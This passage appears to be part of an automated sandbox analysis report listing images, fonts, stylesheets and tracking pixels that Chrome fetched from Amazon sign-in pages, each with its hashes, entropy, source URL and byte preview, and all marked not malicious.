                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1.AQ...."2aq.35RTrst......#46BS....Ub.$Cc.%Ede.D.................................................!.1...A.Qa............?...-..n.q.N...M^.._.f..J.. _...]..+......N._.(:.[...4.'....Z.....F......08*..........#....k?.....?....T8.....'..P^_...8>..my..uo.....j...o.+?........j......?9._.P...........Ar.s... ...?..R......o.+.@..X...\....X+....X*......+> ...>.Aq~sz.............Z.....T.q.s......k........-/...-4^6..:.\&..OS.........=P............E......,...L.}F.....'`.....o.>.Z..^!..>...6S._B.$H/U.....W...Wq..8tnL. ..Y.VPU....?.]=.;.\l...{!{;...q....T.Ps.}...ia..).w.%s......%^.qw.:....J..Tx#.E.......{z...o3...K..f.^..U...V..N.J...R{.e..RPPS.....7....0..X...k7){fQ'.H..*..K....]7og,.:0.-N...4..w[...l......{...M.....W7.e."I..1....<.u
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x250, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):39516
                                                                                                                                                                                                        Entropy (8bit):7.972024116551709
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:xiqBv1n0WFDVzIk6a6XG8kPaq6Oxqp7YNLFFjCA9gfpn11KusA5q423q1:Dtn0YVzIla6W8Q64q9Y3FX9cp1ls+qxK
                                                                                                                                                                                                        MD5:C67B003EAD831C68E0FF99D36099E1A3
                                                                                                                                                                                                        SHA1:1513958AC2F0A22C952F6DE05178A1F3FBCE056C
                                                                                                                                                                                                        SHA-256:D5A9CB812FE2A02197421420D1802E038CAF7EF079E262D003EC1F23E73D0E75
                                                                                                                                                                                                        SHA-512:CF06A5C33B72F16CA1157A4CDB9B95C22C2174ED67D6BA10DAA25228F578A5D48338E80AB9F6C3464E59BA62FD6834BA196830D1F6BAE14F595484213F99A42E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg
                                                                                                                                                                                                        Preview:......JFIF.............C....................................................................C.........................................................................,..............................................T..............................!.1."AQ.2a.#Bq.$R..b....%349Sr...67CTcsuvw.............................................I..........................!1A.."Qaq..2....BR....#b...4r.....$Sc.5s%3...............?..~...%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.*..p.L.FV......_.;%H#.gZ.x...-...S.....e.P....1. P..5.....6.T.R.y..../...m=....W.};.+..U......QX.d.+g.t......... ^&.....i.sJ.C. y.........m.%.'.|...X..OMm=..P.V......t..W....=.&R..Fq.......Y....fL...w...W.?...7.4....w.V.S...X..y.7.#....Ts.v.:wY......g..4Ceh...W.,.le.#*H.C..-R&.JpQ.A.R0..P1H.pz...P-o..s.{.p.1;.J....q{.o.Y......OL<Mn..C.2..N@..$,+.=..[..l.v.<Y.D}.f.~@M4LE...16.R.X~-..<.;i.q......0.8.d........^............i...`.......U.\[.X..P2.A.U..=.`.....c.z.Qc..........7....}..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10496
                                                                                                                                                                                                        Entropy (8bit):7.845369460579096
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:JuhEiq5N4LL8ER/DHH40aq4fnmmtbcxE0XhNJjF3aK2I0zey2Ibd4:JuhEiq5C0E1H40aq4mmtqFXhzFq/zeyW
                                                                                                                                                                                                        MD5:B6FAAEE1594E50974942620A33E8CE79
                                                                                                                                                                                                        SHA1:D6276ED08530DB1623D70CD7289FF42D8741E60D
                                                                                                                                                                                                        SHA-256:4BB9BD341207D0CAC5A9F9FC90C61A63AC91C686EA7C3F6C46246D5BA44564C8
                                                                                                                                                                                                        SHA-512:755615819164BB887822163605C707BAF9ACFCC36D832D0364443272D40DE2DE92E6A4576E7B1440224CA720BAB5B403C10D7214795F55CBA0DAF85D8184EDF3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31iocnwzJSL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0.............................................................,........................................................................................................{.{..#K.m.ko.n.Z..>W.z{...aX6.&...y..[..............y.{..."..+.-..YV...Z.q.7..~^n)...Ew$.....W..:.E.....%..*...............|...R.K..p..s.N.$...u5;...D......W=Q..f).......o6...z.u............<g..6......S.'..N...=...N.^oC.^n=".l=[..vE.F.m.....'.z.?..=M.p=....M............_....4........v........k3...........qY=..K.-.C..U...U...U..~..s..@...........|s._.F..:Y..Q.7..j...cr3+./_.....V.L.ZL./k.L.@V..Kr.R..../.R............<..?..45..J5.3S.b..&...."ni..v...o..52......69..F.w..E.]..W...y.@...........1.#..[..h.']A...*nx....."3H..+rs-....Y..R.n../.....:.G.}[.o..h...........<...p5+u8]Wi.h'...u}.)...d...].q7:..^..z....=.G.N...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 27920, version 1.19661
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):27920
                                                                                                                                                                                                        Entropy (8bit):7.99242211313595
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:768:GryBBofu4XbxijaWE4xQAs9XX+s1jXWp9AegvUXaV1HN:Zo2osDu+s1s9AegvtzHN
                                                                                                                                                                                                        MD5:0F85A003B4D8AFBFEDD8118278061C34
                                                                                                                                                                                                        SHA1:245045FA7DE5DF027437F47209A5ADD3B48108A1
                                                                                                                                                                                                        SHA-256:AFF8DAE3B2DD2A0FD5C5CE60670CBBCA15A1F5BFAFCD70D13AD002EF920920F3
                                                                                                                                                                                                        SHA-512:69206330B785407D74A86D2916A13BC1311DC52218BE3B9F4629971E540D9C2FA6ECE1B2AF82404858242728B6F4079677187D3DED6524C550B2B4F8FD42E8B4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/Dv1WQ5DdeMS5qP7.woff2
                                                                                                                                                                                                        Preview:wOF2......m.......C...l...L.......................z......\.`..J.........4..-.6.$..<..`.. ..8. ..[T#...G..L......p.....t..9M.~.yVJ.../.n.U%.L......r..c...PU....7... ......P.F.c.),..b..Z.[m..f.B....}...x,..I..Fe.....n..;......Jv+......7......^.[%;...N.........)......1@..........&.....t.].1....B.}.>.}8Y.|...../.....n.M......$....k5.K.....Ju+isv........b.$.q.`...EF.IV.'O....z....+0..-....}.......8.c...8D.1C....%...Hlb.X61s..m..f,.6....s..)%.cD...6..`.d......Q... ..(....xr..66.z.z6.J=..._{.>7.]..`.$....R..91C.lBC.....M....V.../q..D....c:...FP..X.$."xP.;........ .F..I.kNm...."T..O.M.u...M/....}...,..-O..@)Pt.(....g{*dO..1..o.L...<...Mx..v...F.H...L.........f\H_..}....M.6.BN........3}.X9..s...w.N..b#......:w...`...".=.......i0....7S.......T?...s.J.'...UN.{Fr..5...^....4.k..#L>V.'.s..;6.]........x..q..|||...D*.J...r.y8..O....$....>.?.q...A.*?..|jn$5.". .K9.?....1.1T"..=0Y..CS...]*..O_.L-.m...8.....eW.w>H.Lfs...v.b0;;...8......!.g......%..P....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8279
                                                                                                                                                                                                        Entropy (8bit):4.80472773710838
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:NXK0lKxspheicMgCSywVg+9GgZi6FVLZmMDWD+LAQ8zZOsWJ2p+eV5S+rTXrU8Kc:NXVl4wg4wVg+9dg3Kp8QOjeZuj2XW
                                                                                                                                                                                                        MD5:CF1534646ECB2265F727E093BDB8EAFF
                                                                                                                                                                                                        SHA1:10014B8A4A6D60F3FC8744ACBB3051F1EE8BE698
                                                                                                                                                                                                        SHA-256:BF4C7DFDC746160EA4410DCB2A3E940FE4271D1BEDBA7D2C7847A90B02440468
                                                                                                                                                                                                        SHA-512:1F5628EAC34C3201886B120BE9263329798AE942FCC4EE4736C008F5F1B959BA5E43B43D7676C7A09D660B3AAFD82CBC442E88832937C344BBA1503583E562BD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/cart/empty/kettle-desaturated._CB424694147_.svg
                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1106.02 634.55"><defs><style>.cls-1{fill:#eaeded;}.cls-2{fill:#d5dbdb;}.cls-3{fill:#889596;}.cls-4{fill:#b8dde2;}.cls-5{fill:#fff;}.cls-6{fill:#9fcbce;}.cls-7{fill:#fafafa;}.cls-8{fill:#cde6e0;}.cls-9{fill:#b4d1ca;}.cls-10{fill:#eefaf5;}.cls-11{fill:#eff5ed;}.cls-12{fill:#cee0ad;}</style></defs><title>kettle-desaturated</title><g id="Layer_2" data-name="Layer 2"><g id="kettle"><path id="background" class="cls-1" d="M1106,401.13H0s-3.86,163,286.1,163c214,0,381.91,70.42,601.91,70.42S1106,401.13,1106,401.13Z"/><g id="echo"><path id="echo-shadow" class="cls-2" d="M562.47,429.56C562.38,435.32,684.75,440,795.22,440s167.2-4.67,167.29-10.43-56.5-10.42-167-10.42S562.56,423.81,562.47,429.56Z"/><polygon id="echo-back" class="cls-3" points="1012.92 155.71 1020.09 155.71 1020.09 418.21 958.21 439.64 1012.92 155.71"/><polygon id="echo-front" class="cls-4" points="787.69 155.71 1012.92 155.71 958.21 439.64 732.97 439.64 787.69 155.71"/><polygon id=
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 242x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6232
                                                                                                                                                                                                        Entropy (8bit):7.851307854013437
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:m7HqJs1Rvh5d2DG8FIaFM5lCF9+bA+fkQIilo:mH13UG8FIaG5lCX7QIilo
                                                                                                                                                                                                        MD5:D7AA8AB13F8D91819094E394B4B42E52
                                                                                                                                                                                                        SHA1:A2FB2B87D193E2167AE2C78EA06ABC68C7F06085
                                                                                                                                                                                                        SHA-256:047BCB8E532C4413EB57A59E0EDACC8067001EA8CB5EAF50E7BB4805C1352997
                                                                                                                                                                                                        SHA-512:1EB424DC07D1D1DAA803966DF53C55AF65FE6EB2A2A0B91DACD0C0DF5CAAD2D193F98A11338DF3BC62E1E564AB86E62342A546EBB145DA986038847E2049D0B1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5............................................................................N.Yj.3jIq..Y.}/...D...H.......4...y.:WVk.#%....Ts...#.{.h....<y=............m.4.{si.n...c7_7..5......C.i.Y.+.dp.l.Q...2.h........kyk.[T..<.M'.r./.n.`bPM..siC..c...W...u..Z...wLn..CU....L.De>.......P.I..|R.=.J.-{......=6.9.emD'..z.t#0........"...T......Ln.{)....g.G7...............;.KL./J...%.;..;..{..U.+]........u.._.T>..Z..Ra...k..a{..........v....]..+}^|m..p.. .....<.Q.u.sr<.........GT.,.R...9.#t._V.i..1=.qGM.}.NBl..........oO.h....r}+6&..GML....,mh..=........"Y]JI-p..VM.....z.............$.......................................!..12@."0. 3A#C.QBRa...........^...K.`gl.rWvIji:.V".........-...D..7..N.%..E.#*2&a.z.>.Y..=.`...X....2#*2-K..*..[?`.I..f.M~{...jFDeE.+J.QA$.pG..E.+..t`..+."'....|..GQ..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:5BRA4F30RSYWBFPSHBR1$uedata=s:%2Fap%2Fuedata%3Fld%26v%3D0.295375.0%26id%3D5BRA4F30RSYWBFPSHBR1%26sw%3D1280%26sh%3D1024%26vw%3D1280%26vh%3D907%26m%3D1%26sc%3D5BRA4F30RSYWBFPSHBR1%26ue%3D1%26bb%3D1102%26cf%3D1135%26be%3D1146%26fp%3D1282%26fcp%3D1282%26pc%3D6300%26tc%3D-1415%26na_%3D-1415%26ul_%3D-1723729123270%26_ul%3D-1723729123270%26rd_%3D-1409%26_rd%3D-754%26fe_%3D-754%26lk_%3D-735%26_lk%3D-735%26co_%3D-735%26_co%3D-598%26sc_%3D-735%26rq_%3D-598%26rs_%3D-314%26_rs%3D-2%26dl_%3D-159%26di_%3D1264%26de_%3D1264%26_de%3D1265%26_dc%3D6299%26ld_%3D6299%26_ld%3D-1723729123270%26ntd%3D-1%26ty%3D0%26rc%3D1%26hob%3D1%26hoe%3D1%26ld%3D6300%26t%3D1723729129570%26ctb%3D1%26rt%3Dcf%3A3-0-3-0-1-0-0__ld%3A17-14-3-0-2-0-1%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-11%7CmutObsYes%7Cfls-eu-amazon-com%7Cadblk_no%7CperfYes%7Cfy_cdn_fr%7Cfy_cdn_mp%7Ccsm-feature-touch-enabled%3Afalse%7CmutObsActive%7Caui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26viz%3Dvisible%3A1%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D5BRA4F30RSYWBFPSHBR1%26aftb%3D1%26ui%3D2%26lob%3D0:6301
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3253), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3253
                                                                                                                                                                                                        Entropy (8bit):4.916875587640181
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:L/VAcYbiqKw/sSvtVP/V35dcT2uf2nxIDfH25OT7fZW:OPbiqCstVPFXxcfo
                                                                                                                                                                                                        MD5:30E6A86D9466160DF30D9811937F3195
                                                                                                                                                                                                        SHA1:FBC9809C9935FDFD7F8EA4118F993D89D648EB73
                                                                                                                                                                                                        SHA-256:451E887C3F1DC81D800BC27E1DC20FF3D03EDFF4E0EB2603E0FE05C3E8FB7C62
                                                                                                                                                                                                        SHA-512:5DB39B53B8791E00F1FEAB6010904C5DA2C143C4F5B12AD845803D264303B1153B9A6AC7F5F45DA2A167B4072196A44C9E68DFCB594CB8C467591AB0175B922B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/11ly5CFE1YL.css?AUIClients/AuthXClaimCollectionUIAssets
                                                                                                                                                                                                        Preview:#claim-input-container{display:flex;border:1px solid #888C8C;border-radius:3px;box-shadow:0 1px 2px rgba(15 17 17 / 15%) inset;outline:0;direction:ltr}#claim-input-container.a-form-focus{border-color:#007185;box-shadow:0 0 0 3px #C8F3FA,0 1px 2px rgb(15 17 17 / 15%) inset;background-color:#F7FEFF}#claim-input-container .a-dropdown-container.a-form-focus{border-radius:3px;outline:0;border-color:#007185;box-shadow:0 0 0 3px #C8F3FA,0 1px 2px rgb(15 17 17 / 15%) inset;background-color:#F7FEFF;border-style:solid;border-width:thin}#claim-input-container.a-form-error{border-color:#CC0C39;box-shadow:0 0 0 1px #CC0C39 inset}.legal-text{font-size:13px!important}.legal-text a:link{text-decoration:underline!important}.create-account{font-weight:500!important}#claim-input-dropdown .a-button-text{font-size:inherit}#ap_email_login,#claim-input,#claim-input-container .a-input-text-wrapper{flex:1}#ap_email_login,#ap_email_login:focus,#claim-input,#claim-input-container .a-input-text-wrapper,#claim-inp
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x302, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8371
                                                                                                                                                                                                        Entropy (8bit):7.898027080659535
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:v/+4yA92jf+EASU8iVPCBH+jTcFh3ZrX2ohYtpoP28:3+4ajVASULVP1sHrXnfP28
                                                                                                                                                                                                        MD5:E45CC741C0593E2BAD8565FBFAA1F41B
                                                                                                                                                                                                        SHA1:05186F7709B9C1B68C3D2A397835BDA4BCDCE3F3
                                                                                                                                                                                                        SHA-256:5ED974E439B7C6E99DCEFA2554748364E57517C6C34A1A8094667834478955D5
                                                                                                                                                                                                        SHA-512:B00219B805BFC802A818D5AE8A5B944A459A047054B2CE3166ECC96AA5D2462476A022CA48A095B77D5F3D1725E1E956732C7A0403602DE867AA4E63DDDF6F16
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/41WTONCfm9L.AC_SX250.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................,........).e.s....y..q.%0w.....K@.Nh..............uG.Li....8.6.3..z....;8.^`.............+m[.LY.9..x8.....|+v.................T...d..K....a..L}.....`uy...........7...Z..:.....E.9]9I..c..&-...6pn&0...a..\}.3.............~...p.)#|..f..!.R.6.Q,....7.......0........+8...{..D.x".i.....D.M..]h..`;......,........+8 .{..<.?....W.n\v..o.V.u).....L/p..............g.C..<...$......vi.1fa.,L.i.a.f.6m.K..~P......C....Z...1..!..f..N.j.z....^.N.V.f"-.'R.j.#Mn.9..[7....c>..G.'..n...`..E.....9#...............3.^.=.$.....=mL~.K.V...{.<.<..d..8...c.(.N...v.B..S....9.qd.s.3........7...|l.J.<...i...C.........gWo.S..<G....^.R.#../.v{.&.}.1.|G...t4....6.,..i...a*...M.W.....Y.......&yM....Y..../'..B.Q..,.H..7o..>.......m.v.7..@...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 16616, version 1.655
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):16616
                                                                                                                                                                                                        Entropy (8bit):7.986966282975233
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:0qJzQ61qLjMj2JfDC3uq2B/YgduJyovfw4TQRJGL7VGhX8aJl/hObP:x8LHMjGbCeqEFuBwkqJGLhGhVLsP
                                                                                                                                                                                                        MD5:4AFCD3B79B78D33386F497877A29C518
                                                                                                                                                                                                        SHA1:CC7EBAA05A2CD3B02C0929AC0475A44AB30B7EFA
                                                                                                                                                                                                        SHA-256:CDED49F94FC16DC0A14923975E159FBF4B14844593E612C1342C9E34E2F96821
                                                                                                                                                                                                        SHA-512:2DC9FFF1D57D5529C9C7BFF26FA9F3F94ADC47E9CEF51D782E55ECF93045200140706AB5816DFD4A0B49B8DB2263320FA2F0FA31A04E12D0C91FEA79B127255D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/pDxWAF1pBB0dzGB.woff2
                                                                                                                                                                                                        Preview:wOF2......@........l..@.........................?FFTM..8..z..@.`..~.....P..9.6.$..F..<.. ..,..a?webf....5l.F..VU..#7.Q...d......k...r....{.T....2KuI.1.+j...(..kvf8...7.+.&.....t..!Z..C...>..=.....v.9_.% .L.....z..........0.e....;.7>.d..S..[..&/....=.9w.n...=.FH.h$...<....s.s.F..`...c....@...}.MP.@.A`T+..J.,F..XT....@..c......TH....OZ..u.....V..u..g...#..~"...Df.\M..-...n.Cu..{f..@.b{B...x......2..;.B...Ah.).....m...Q`!V.IH.pG...T.mb..p.[.v....Z=..P...I.,....m....;..Hva.*..@..x..:.....=&'G. ..0.....Mi...LC...t6..N5..m.........TH.....mY#..g..#.$...7..}...cS{..!.'..n..3...0......lw..D.,l..x...hH.I..lZ.]...4h/..>-A...wAv....W..KeYj{.V[c..d...d/..1.g.(:..5......h.(;@..........0..]+my.qdQ.>..JGu5.v2.3/.)..h.I2.P.. ....P..l......UU..#.d......R..x...)..d...2.....ov..%'..R5.97jA.._...m#..:.Z..r..5.!1.a.`..o.\<.4..j..._.......+Y)E......."A$..-._........c.C-.\....C../C..>..;T.@K...aB.o}t.>..~...>............uP|..\|.....1.. x....-%.....<>.$M..(..e......Un.rf0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D417%26pc%3D5151%26at%3D5151%26t%3D1723729121680%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:5150
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3239
                                                                                                                                                                                                        Entropy (8bit):7.861644448284129
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rmIekrTcYpoahfAIUysNUzYX+bji5zw4D0sms9ZBiXF7dFG/OLOb1eGBI6Jb/:TcrwE5F58X+bji5rg0Z01RFuQGBTzJmm
                                                                                                                                                                                                        MD5:77D775A6F25619B489A0CAF60B01A54C
                                                                                                                                                                                                        SHA1:CA0826D43666898BB740578F3F0B277A777E4487
                                                                                                                                                                                                        SHA-256:7A86F4CDF013F8B639D58EB8AC1F114DDA43BC5AD3BF93FCD3B3DA2B3D0FCD31
                                                                                                                                                                                                        SHA-512:D7E84A4C4F45FBF493B4BE16CD52DAB767D437874745CA9C29510F638F4E1E5AAEA5ADCDD56E94807E668FC3260D09F925912FF6F926062416ED5927ACF63C9F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1..2AQq..."ab...BRrs.....#3CS..%c...................................................!1.A.."2............?...../Sj.">.s..F..E.=.5.cM.p.h..,(.....B...A..}#-W"-..H..>..(.i. ...g....S<....tF..1.....>x.mj..O...@1`.."..t.......E.5.y...a.......A...Fk.|........=7c......q.Z..u4..N~.......G-..C....O...y..).)nG.........+un.Hg.l.!......Z.....;.Q...A.i."m*.6v....4.=..`.}.m........G.|...Si.Y..dJ\.qM.%.i..C..O..C...H.Kqr.N........LI........@..Y-vU....O..MT{][...1V..0.nP[..M.6{4s....T..8....i.._(;\i.q.7.j.....fa..)=UK..Z....j.7.e.>...,O.#z.A..!a....V..8....*......M.oZ.?) .i.*Q..0.........OJ......#...@i.<.......m.....%O.O..Q.H......Z.A...E....S. 6..~.."-..8..q:O.....%.'.....0bNZ.x.{...`5..U>..F*d($...... ....g..:W.....G.....n..[.v.G....nKV|j..#4...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 87x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3084
                                                                                                                                                                                                        Entropy (8bit):7.846744007256133
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rSBU8WYWL5zH1ien51NV8LJr7CgIyTHsZqxoqDdad+ZmFuUWF1V/yGAm4:T4dEqO1dIRqDdaEKuUuA24
